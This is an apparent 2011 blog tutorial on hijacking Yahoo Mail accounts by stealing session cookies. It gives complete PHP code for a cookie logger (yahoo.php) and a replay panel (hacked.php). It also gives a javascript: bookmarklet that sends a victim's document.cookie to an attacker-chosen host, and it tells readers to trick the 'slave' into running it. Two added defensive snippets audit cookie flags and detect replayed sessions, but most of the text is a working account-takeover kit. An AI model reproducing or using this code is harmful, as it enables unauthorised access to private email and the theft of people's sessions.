Wednesday, August 24, 2011

Hacking Email Yahoo by Stealing Cookies

FOR EDUCATIONAL PURPOSES ONLY!

Please delete if it is a repost. Thank you!

First of all, let's go over the basics of cookies.
What are session cookies or session IDs?
--->Whenever we sign into an account, the site generates a unique string. One copy is saved on the server and the other in our browser as a cookie. The two are compared every time we do anything in our account. Session cookies let the website you are visiting keep track of your movement from page to page, so you don't get asked again for information you have already given to the site. They allow you to move through many pages of a site quickly without having to authenticate again in each new area you visit. This string, the login session, is destroyed when we click the 'Sign Out' option.

Now let's see how it works:
Just visit yahoo.com, paste the code below into your browser's URL bar and press Enter (you will get a pop-up box showing the cookies):

Code:
javascript:alert(document.cookie);

Now let's go deeper:
Log in to your account and run the same code again. You will notice some extra elements added to the cookies; these represent the session IDs.

So sessions are stored in our browser in the form of cookies.
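The trick above only works because those session cookies are readable from page script. A cookie set with the HttpOnly attribute never appears in document.cookie, so the same alert() shows nothing useful. The following is an added example (not code from the original post) that models which cookies a page script can see and audits a Set-Cookie header for the attributes a defender expects; the cookie names Y and T mirror the ones the post's scripts parse, but every value here is constructed.

```javascript
// Added example (not from the original post): model which cookies a page
// script can read, and check the Set-Cookie attributes that prevent it.
// document.cookie exposes only cookies set WITHOUT HttpOnly, so a session
// cookie carrying HttpOnly is invisible to javascript:alert(document.cookie).

// Parse one Set-Cookie header line into { name, value, attrs }.
function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = parts[0].slice(0, eq).trim();
  const value = parts[0].slice(eq + 1).trim();   // value may itself contain '='
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    const k = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[k] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// What a page script would see in document.cookie for this cookie jar.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter(c => !c.attrs.httponly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// Audit a session cookie: report each hardening attribute that is missing.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push('missing HttpOnly: readable via document.cookie');
  if (!c.attrs.secure) findings.push('missing Secure: sent over plain HTTP');
  const ss = String(c.attrs.samesite || '').toLowerCase();
  if (ss !== 'lax' && ss !== 'strict') findings.push('missing SameSite=Lax/Strict');
  return { name: c.name, ok: findings.length === 0, findings };
}

// Constructed sample jar: Y and T are the cookie names the post's scripts
// parse; the values and the 'sid' cookie are made up for this example.
const SAMPLE_JAR = [
  'Y=v=1&n=abc123&l=example/o&p=m2; Path=/; Domain=.example.com',
  'T=z=sample&a=token; Path=/; Domain=.example.com',
  'sid=opaque-session-id; Path=/; Secure; HttpOnly; SameSite=Lax',
  'B=tracking; Path=/',
];

console.log('document.cookie would show:', visibleToScript(SAMPLE_JAR));
console.log(auditSessionCookie(SAMPLE_JAR[0]));
console.log(auditSessionCookie(SAMPLE_JAR[2]));
```

Running it shows that only the three cookies without HttpOnly reach document.cookie, while the hardened sid cookie passes the audit and the Y cookie fails all three checks. HttpOnly stops script from reading the cookie; it does not stop a script from sending requests with it, so it is one layer, not a complete fix.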

An attacker can steal that session by convincing the slave (the victim) to run a piece of code in the browser. The attacker can then use the stolen session to log in to the slave's account without providing any username or password. This attack is uncommon because when the slave clicks 'Sign out' the session gets destroyed and the attacker gets signed out too.

But in the case of Yahoo it's not the same. The attacker doesn't get signed out when the slave clicks 'Sign out'. The session is automatically destroyed by Yahoo after 24 hrs, but when the user simply refreshes the window in the Yahoo account, he gets a new session for the next 24 hrs. This means that once the Yahoo account session is stolen, the attacker can keep access to the account indefinitely by refreshing the window every 24 hrs. I am not actually sure whether it is 24 or 48 hrs.

Here we go, this is what we need:
Steps for stealing session cookies:
1. Sign up for an account at any free web hosting site.
2. Now log in to your account and go to the file manager. Put these files in the www folder:
a. Name this code hacked.php
Code:
<?php
$pass = "scifix";

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title id=xx>scifix</title>
<link rel="stylesheet" href="c.css" />
<script type="text/javascript" src="j.js"></script><style type="text/css">
<!--
body {
    background-color: white;
}
-->
</style>
<style type=text/css>
#xx{font-family:"Times New Roman" size:30px}
</style>

</head>
<body>
<!---

--->
<div id="header" class="header">

    <td align="left">
      <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
        <tr align="left">
          <td width="50%">&nbsp;</td>
          <td width="50%"> <p align="right"><a href="?"><span class="links"> Refresh | </span></a><a href="?logout=1"><span class="links"> LogOut </span></a>
          </p></td>
        </tr>
      </table>
  </td>
</td>
</div>
<br />
<br />
<br />

<center>
  <font color="black" face="Terminal" size=9 >www.hackforums.net</font>
</center>
<center>
  <font color="blue" size="6" face="Terminal">SCIFIX AT YOUR SERVICE --sharing is learning--</font>
</center>

<br />
<br />
<br />



<div id="wrapper">

  <table cellpadding="0" cellspacing="0" border="0" class="sortable" id="sorter">
    <tr>
      <th width="162"><p><font color="red" >Hacked account (Click to access) </font></p></th>
      <th width="170"><p><font color="red" >Date</font></p></th>
     
      <th width="77"><p><font color="red" >Delete</font></p></th>
  </tr>
  <?php
   if($_GET['logout'] == 1) {
  echo "<script>document.cookie ='pass=; path=/'</script>";
  echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=?\">";
   }

  if(isset($_POST["pass"])) {
echo "<script>document.cookie ='pass=".$_POST['pass']."; path=/'</script>";
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=\">";
                 }
if($_COOKIE['pass'] != $pass) {


        echo '</table></div><div align="center"><b>Enter the password (I hope javascript is on): </b><p><form method="post">' .
             '<input type="password" name="pass"> <input type="submit" name="check" value="Login">' .
             '</form> </div>';
          exit(0);
}



if($_GET['del']) {
        @unlink("./cookies/".$_GET['del']);
                    }

if ($handle = opendir('./cookies/')) {
    while ($file = readdir($handle)) {
        if ($file != "." && $file != ".." && $file != "index.html") {



$fcookie = "./cookies/".$file;
$fh = fopen($fcookie, 'r');
$cookie = fread($fh, filesize($fcookie));

    $T = explode("T=", $cookie); $T = $T[1];
    $T = explode(";", $T); $T = $T[0];

    $Y = explode("Y=", $cookie); $Y = $Y[1];
    $Y = explode(";", $Y); $Y = $Y[0];

    $yid = explode("l=", $Y); $yid = $yid[1];
    $yid = explode("/o", $yid); $yid = $yid[0];

    $str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
    $str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
    $id = ""; for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};

    $p = substr($Y, strpos($Y, "p=") + 2, 7);
   
    $date = date ("M d Y H:i:s", filemtime("./cookies/".$file));

    $lang = explode("lg=", $Y); $lang = $lang[1];
    $lang = explode("&", $lang); $lang = $lang[0];


    $sr = array(array(";", "&", "="), array(null, "%26", "%3D"));
    $y = "Y%3D" . str_replace($sr[0], $sr[1], $Y);
    $t = "T%3D" . str_replace($sr[0], $sr[1], $T);

echo "<tr><td><a  href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"><b><font color=white size= 5px> ".$id."</font></b></a></td><td>";
echo $date."</td><td>";

echo "<a href=\"?del=".$file."\">Delete it</a></td></tr>";

}
}
    closedir($handle);
}


?>

        </tr>

    </table>
</div>
<script type="text/javascript">
var sorter=new table.sorter("sorter");
sorter.init("sorter",1);
</script>

</body>
</html>

b. Name this code j.js

 
Code:
var table=function(){
    function sorter(n){
        this.n=n; this.t; this.b; this.r; this.d; this.p; this.w; this.a=[]; this.l=0
    }
    sorter.prototype.init=function(t,f){
        this.t=document.getElementById(t);
        this.b=this.t.getElementsByTagName('tbody')[0];
        this.r=this.b.rows; var l=this.r.length;
        for(var i=0;i<l;i++){
            if(i==0){
                var c=this.r[i].cells; this.w=c.length;
                for(var x=0;x<this.w;x++){
                    if(c[x].className!='nosort'){
                        c[x].className='head';
                        c[x].onclick=new Function(this.n+'.work(this.cellIndex)')
                    }
                }
            }else{
                this.a[i-1]={}; this.l++;
            }
        }
        if(f!=null){
            var a=new Function(this.n+'.work('+f+')'); a()
        }
    }
    sorter.prototype.work=function(y){
        this.b=this.t.getElementsByTagName('tbody')[0]; this.r=this.b.rows;
        var x=this.r[0].cells[y],i;
        for(i=0;i<this.l;i++){
            this.a[i].o=i+1; var v=this.r[i+1].cells[y].firstChild;
            this.a[i].value=(v!=null)?v.nodeValue:''
        }
        for(i=0;i<this.w;i++){
            var c=this.r[0].cells[i];
            if(c.className!='nosort'){c.className='head'}
        }
        if(this.p==y){
            this.a.reverse(); x.className=(this.d)?'asc':'desc';
            this.d=(this.d)?false:true
        }else{
            this.p=y; this.a.sort(compare); x.className='asc'; this.d=false
        }
        var n=document.createElement('tbody');
        n.appendChild(this.r[0]);
        for(i=0;i<this.l;i++){
            var r=this.r[this.a[i].o-1].cloneNode(true);
            n.appendChild(r); r.className=(i%2==0)?'even':'odd'
        }
        this.t.replaceChild(n,this.b)
    }
    function compare(f,c){
        f=f.value,c=c.value;
        var i=parseFloat(f.replace(/(\$|\,)/g,'')),n=parseFloat(c.replace(/(\$|\,)/g,''));
        if(!isNaN(i)&&!isNaN(n)){f=i,c=n}
        return (f>c?1:(f<c?-1:0))
    }
    return{sorter:sorter}
}();

c. Name this code c.css

 
Code:
* {margin:0; padding:0}
body {font:10px Verdana,Arial}
#wrapper {width:825px; margin:30px auto}
#header    {width:100%; height:18px; background: repeat-x; text-align:left;}
.sortable {width:823px; border:1px solid white; border-bottom:none}
.sortable th {padding:4px 6px 6px; background:white; color:#fff; text-align:left; color:#ccc}
.sortable td {padding:2px 4px 4px; background:white; border-bottom:1px solid #ccc}

.sortable .head:hover, .sortable .desc:hover, .sortable .asc:hover {color:#fff}
.sortable .even td {background:green}
.sortable .odd td {background:#fff}

.links {
    color: white;
    text-decoration: none;
    text-align: right;
}

a {
    text-decoration: none;
    color: black;
        face: terminal;
}

d. Name this code yahoo.php

 
Code:
<?php
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////


$redirect_to = 'http://yahoo.com';
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

if(!isset($_GET["ex"]) || empty($_GET["ex"]))  {
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$redirect_to."\">";

} else {

$cookie = $_GET['ex'];
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$redirect_to."\">";
$Y = explode("Y=", $cookie); $Y = $Y[1];
$Y = explode(";", $Y); $Y = $Y[0];
$yid = explode("l=", $Y); $yid = $yid[1];
$yid = explode("/o", $yid); $yid = $yid[0];
$str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
$str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
$id = "";
for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};
if ($id != '') {
$rand = rand(0, 1000000);
$fcookie = "./cookies/".$id."_".$rand;
$fh = fopen($fcookie, 'w') or die("chmod???");
fwrite($fh, $cookie);
fclose($fh);
}
}
?>
e. Finally, create an empty folder named cookies (this is where the stolen cookies are stored).

3. Now give this code to the slave to run in his browser while he is logged in to his/her Yahoo account.

Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Note: yahoo.php is basically the cookie-stealing script, and hacked.php replays the stolen cookies in your browser.
Stolen cookies are stored in the folder named 'cookies'. And remember to change the address in the code above (http://yourdomain.com) to the domain name you got when you signed up for free web hosting.

When the slave runs the code in his browser, he is redirected straight back to his Yahoo account.

4. Now open hacked.php.
The URL would be: http://yourdomain.com/hacked.php

And enter the password (Default password is scifix)

Now you should see the username of the slave's account. Simply click on it and it takes you to the inbox of the slave's Yahoo account without asking for any password.
It doesn't matter if the slave signs out of his account; you remain logged in to it.

Note: You can try this attack using two browsers. Sign in to a Yahoo account in one browser and run the code. Then sign in through the other browser using the stolen session.
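That two-browser test is also the signal a defender can look for: a replayed session shows up in the server logs as one session id used from two different client fingerprints (IP address plus User-Agent). The following is an added example (not code from the original post) of a small detection pass over access logs; the log format, field order and every value in it are constructed for the example.

```javascript
// Added example (not from the original post): detect one session id being
// used from more than one client, the footprint a replayed session cookie
// leaves in access logs. Log format and all values are constructed.

// One constructed line per request:
//   "<ISO time> <session id> <ip> \"<user agent>\" <path>"
const SAMPLE_LOG = [
  '2011-08-24T10:00:01Z sess-aaaa 203.0.113.10 "Firefox/6.0" /ym/login',
  '2011-08-24T10:00:05Z sess-aaaa 203.0.113.10 "Firefox/6.0" /ym/ShowFolder',
  '2011-08-24T10:03:40Z sess-aaaa 198.51.100.7 "Chrome/13.0" /ym/ShowFolder',
  '2011-08-24T10:04:02Z sess-aaaa 198.51.100.7 "Chrome/13.0" /ym/ShowLetter',
  '2011-08-24T10:10:00Z sess-bbbb 192.0.2.44 "Safari/5.1" /ym/login',
  '2011-08-24T10:11:00Z sess-bbbb 192.0.2.44 "Safari/5.1" /ym/ShowFolder',
  'this line is malformed on purpose',
];

const LINE_RE = /^(\S+) (\S+) (\S+) "([^"]*)" (\S+)$/;

// Parse one line into a record, or null if it does not match the format.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { time: Date.parse(m[1]), session: m[2], ip: m[3], ua: m[4], path: m[5] };
}

// Returns one finding per session id used by more than one client fingerprint.
// The fingerprint seen first is treated as the legitimate owner; every other
// fingerprint is reported with the delay since the owner's first request.
function findSharedSessions(lines) {
  const bySession = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;                       // skip malformed lines, don't crash
    if (!bySession.has(rec.session)) bySession.set(rec.session, []);
    bySession.get(rec.session).push(rec);
  }
  const findings = [];
  for (const [session, recs] of bySession) {
    recs.sort((a, b) => a.time - b.time);
    const clients = new Map();                // fingerprint -> first time seen
    for (const r of recs) {
      const fp = `${r.ip}|${r.ua}`;
      if (!clients.has(fp)) clients.set(fp, r.time);
    }
    if (clients.size < 2) continue;
    const [[ownerFp, ownerTime], ...others] = [...clients.entries()];
    findings.push({
      session,
      owner: ownerFp,
      suspects: others.map(([fp, t]) => ({
        client: fp,
        secondsAfterOwner: (t - ownerTime) / 1000,
      })),
    });
  }
  return findings;
}

console.log(JSON.stringify(findSharedSessions(SAMPLE_LOG), null, 2));
```

On the sample, sess-aaaa is flagged with the Chrome client appearing 219 seconds after the Firefox owner, while sess-bbbb is clean. A hit is a reason to invalidate the session server-side and require a fresh login, not proof on its own: users behind changing NAT addresses or proxies will also trip an IP-based check, so a real rule should weight the User-Agent change and the time gap.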

Good luck, guys! Anyway, use an English-to-Indonesian translator if that makes it easier to understand.

Disclaimer: I will not be liable for any loss,any physical injury or any lawsuit upon using this tutorial, use at your own risk ^_^
